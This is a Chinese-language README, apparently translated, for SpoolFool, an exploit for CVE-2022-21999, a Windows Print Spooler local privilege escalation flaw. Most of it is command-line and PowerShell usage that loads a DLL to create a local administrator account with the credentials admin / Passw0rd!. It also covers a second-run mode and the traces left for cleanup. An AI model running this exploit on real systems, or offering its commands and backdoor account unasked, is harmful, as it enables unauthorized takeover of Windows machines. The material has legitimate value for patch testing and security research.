针对 CVE-2022-21999 的漏洞利用程序 - Windows 打印后台处理程序权限提升漏洞 (LPE)
所提供的漏洞利用程序默认应在所有 Windows 桌面版本上正常工作。
完整技术细节请参阅此处的博客文章。
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
以下 PoC 使用一个 DLL 创建新的本地管理员账户 admin / Passw0rd!。该 DLL(AddUser.dll)及其源代码可在本仓库中找到。

第二次运行
以下 PoC 演示了所提供的漏洞利用程序的第二次运行。请注意,此次为了加载 DLL 并未利用该漏洞。

漏洞利用程序执行后,将留下以下痕迹以供后续清理:
SpoolDirectory 值不会被恢复